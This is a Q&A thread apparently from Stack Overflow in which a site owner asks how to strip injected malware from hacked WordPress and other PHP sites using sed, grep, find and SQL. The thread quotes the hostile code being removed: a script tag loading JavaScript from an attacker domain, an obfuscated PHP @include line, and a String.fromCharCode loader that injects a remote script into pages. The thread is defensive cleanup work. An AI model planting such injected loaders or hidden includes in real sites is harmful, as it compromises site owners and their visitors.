# How to replace whole string using sed or possibly grep

Tags: bash, shell, sed, grep

So my whole server got hacked or got the malware problem. my site is based on WordPress and the majority of sites hosted on my server is WordPress based. The hacker added this line of code to every single file and in database

```
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
```

I did search it via grep using

```
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
```

I'm trying to replace it throughout the file structure with `sed` and I've written the following command.

```
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
```

I'm trying to replace the string on a single file `index.php` first, so I know it works.

and I know my code is wrong. Please help me with this.

I tried with the @Eran's code and it deleted the whole line, which is good and as expected. However, the total jargon is this

```
/*ee8fa*/

@include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";

/*ee8fa*/
```

And while I wish to delete all the content, I wish to keep the php opening tag `<?php`.

Though @slybloty's solution is easy and it worked.

so to remove the code fully from all the affected files. I'm running the following 3 commands, Thanks to all of you for this.

1. `find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g"` - To Remove the script line
2. `find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d'` - To remove the `@include` line
3. `find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d'` - To remove the comment line

Also, I ran all 3 commands again for `'*.html'`, because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.

now, I still need to figure out the junk files and traces of it.

The hacker script added the JS code as well.

```
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
```

Trying to see if I can `sed` it as well.

Comment: How do you know your code is wrong?

Comment: Because, I ran it and it keeps asking for more input in next line at like ` >  `

Comment: Can't you just delete the line? sed -i '/trasnaltemyrecords/d'

Comment: **Try something simpler.** Try `sed -i 's/./X/' index.php` and see if it works (i.e. changes the first character of each line to 'X'). If if doesn't work, try `sed -i "" 's/./X/' index.php`. Tell us the result.

Comment: I have about 6-7 sites wp, open Cart, Magento and mostly all the files have been infected. There are around 1000+ files.

Comment: I will try it and will surely update the right command which works. Thanks.

Comment: In lieu of my answer, I think @EranBen-Natan's solution would be ideal.  Rather than make it a blank line, just delete the line entirely.

Comment: @Eran, so if I run this command, it will delete whole line?

Comment: Also, you could add your grep in there to feed in all the files with this line in them like this: `while read -r filename; do sed -i '/trasnaltemyrecords/d' "$filename"; done <<< "$(grep -lr trasnaltemyrecords /var/www/html/{*,.*})"`  The `-l` option just provides the file name and not the matching text.

Comment: One more thing... If you take this approach, I would take advantage of the "back up" optional parameter for `sed -i`.  For example, `sed -i.bak` will create a `*.bak` file for all files that are edited.  When used with the `while...grep` loop, you will only be backing up files that contained that string.  Sorry for all the additional comments, but in my opinion, malware is an "all hands on deck" scenario.

Comment: What @Jason said.  Use sed's `d`.  Or `grep -v 'transaltemyrecords' junkfile > goodfile`

Comment: Yikes.  At this point I would start trying to run a backup if that is an option.  kamil's answer is good and efficient, but there is a glaring issue in your current state.  `sed -i` re-writes your file whether it finds that pattern or not.  Now all your files last modified dates are probably all the same.  That was the idea behind the `grep` into `while` loop solution.  Only affected files would be touched.  A simple `ls -ltr` would paint a clear picture for you.  I've edited my answer to include a solution for edit 2.  It will work, but I'm not sure if it is the best option.

Comment: @Dilip, yes it will

Answer (score 2):

Use double quotes (`"`) for the string and don't escape the single quotes (`'`) nor the tags (`<>`). Only escape the slashes (`/`).

```
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
```

Answer (score 2):

Single quotes are taken literally without escape characters. 
In `var='hello\''`, you have an un-closed quote.

To fix this problem, 
1) Use double quotes to surround the `sed` command **OR**
2) Terminate the single quoted string, add `\'`, and reopen the quote string.

The second method is more confusing, however.

Additionally, `sed` can use any delimiter to separate commands.  Since you have slashes in the commands, it is easier to use commas. For instance, using the first method:

```
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
```

Using the second method:

```
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
```

This example is more educational than practical. Here is how `'\''` works:

First `'`: End current quoted literal string

`\'`: Enter single quote as literal character

Second `'`: Re-enter quoted literal string

As long as there are no spaces there, you will just be continuing your `sed` command.  This idea is unique to `bash`.

I am leaving the escaped `<` and `>` in there because I'm not entirely sure what you are using this for.  `sed` uses the `\<` and `\>` to mean word matching.  I'm not sure if that is intentional or not.

If this is not matching anything, then you probably want to avoid escaping the `<` and `>`.

Edit: Please see @EranBen-Natan's solution in the comments for a more practical solution to the actual problem.  My answer is more of a resource as to why OP was being prompted for more input with his original command.

**Solution for edit 2**

For this to work, I'm making the assumption that your `sed` has the non-standard option `-z`.  GNU version of `sed` should have this.  I'm also making the assumption that this code always appears in the format being 6 lines long

```
while read -r filename; do
    # .bak optional here if you want to back any files that are edited
    sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g'
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
```

How it works:
We are using the beginning of the fromCharCode line to match everything.
`-z` splits the file on nulls instead of new lines.  This allows us to search for line feeds directly.

`[^\n]*\n` - This matches everything until a line feed, and then matches the line feed, avoiding greedy regex matching.  Because we aren't splitting on line feeds (`-z`), the regex `var pl = String\.fromCharCode(104,116,116,112,115' .).*\n}\n` matches the largest possible match.  For example, if `\n}\n` appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Thus, repeating this sequence 6 times matches us to the end of the first line as well as the next 5 lines.

`grep -lr` - Just a recursive `grep` where we only list the files that have the matching pattern.  This way, `sed` isn't editing every file.  Without this, `-i.bak` (not plain `-i`) would make a mess.

Comment: Thanks @Jason, i will try your method for this. Right now, i don't have option for the backup. So I'm stuck with cleaning it.

Comment: @DilipGupta I would suggest backing up where you are now.  You can use something like `rsync` to backup and restore.

Comment: Do you use adminer.php ? seems its infectable

Answer (score 2):

Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with `find` and `xargs`. For example:

```
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
```

It will:

- `find` - find
- `-type f` - only files
- `-name '*.txt'` - that end with php
- `-print0` - pritn them separated by zero bytes
- `| xargs -0` - for each file separated by zero byte
- `-P7` - run 7 processes concurently
- `-n1` - for each one file
- `sed` - for each file run sed
- `-i` - edit the file in place
- `'...'` - the sed script you want to run from other answers.

You may want to add `-t` option to `xargs` to see the progress. See [man find](http://man7.org/linux/man-pages/man1/find.1.html) (man args](http://man7.org/linux/man-pages/man1/xargs.1.html).

Answer (score 1):

Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in `wp-content/plugins/wp-mail-smtp/src/Debug.php`.

Also, the javascript link is in every `post_content` field in `wp_posts` in WordPress database.

Comment: Yes, I do have that plugin installed and it is there like you said. I'm trying to clean up first and then tighten the security.

Also note, the hacker did installed the plugin called `super-socialat`, check for that as well.

Comment: What exactly did you found in that Debug.php, I didnt find anything strange in there but maybe its stored in another file, if you would provide some part of code I could maybe search the files please ? Did not found new plugin installed.

Comment: What editor have you used? If I open that in vim, I can see that weid thing, but not in nano or some editor like Geany....
https://imgur.com/a/wC9XAIy
https://pastebin.com/Y39KEfDL

Comment: Hi, i was looking on that through winscp, but now also tried vi, still didnt found a thing. Tnx much for example Ill tri to search it in files.

Comment: From some light look at it it seems to be an sql statement which is written using letters positions in $GLOBALS variable or something like that, so it cant be found by simply looking for "trasnaltemyrecords"
I tried to look for 
grep -r "NULL);@$" /var/www/html/{*,.*} or other things but found nothing.  Anyways I had an old adminer.php on the wordpress page so that could be also source of that leak, maybe ..

Answer (score 0):

I got the same thing today, all page posts got this nasty virus script added

```
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
```

I dissabled it from database by

```
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
```

I do not have files infected at least

```
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
```

did not found a thing, but I have no idea how this got into database from which am not calm at all.

This infection caused redirects on pages, chrome mostly detect and block this. Did not notice anything strange in - /wp-mail-smtp/src/Debug.php

Comment: I assume this is related to some of the plugin's break and the hacker got the back door access to the site.

Comment: But which plugin , 2 hous passed and everything is back again redirecting

Answer (score 0):

I've got the same thing today, all page posts got the script added.
I've handled with them successfully by using the [Search and replace](https://en.wordpress.org/plugins/search-and-replace/) plugin.

Moreover, I've also found one record in **wp_posts** table **post_content** column
folowing string:

```
<a href="https://scripts.trasnaltemyrecords.com/pixel.js?track=r&#038;subid=043">https://scripts.trasnaltemyrecords.com/pixel.js?track=r&#038;subid=043</a>
```

and deleted it manually.

Answer (score 0):

For me worked this:

```
    find ./ -type f -name '*.js' |  xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
```

You have to search for : *.js, *.json, *.map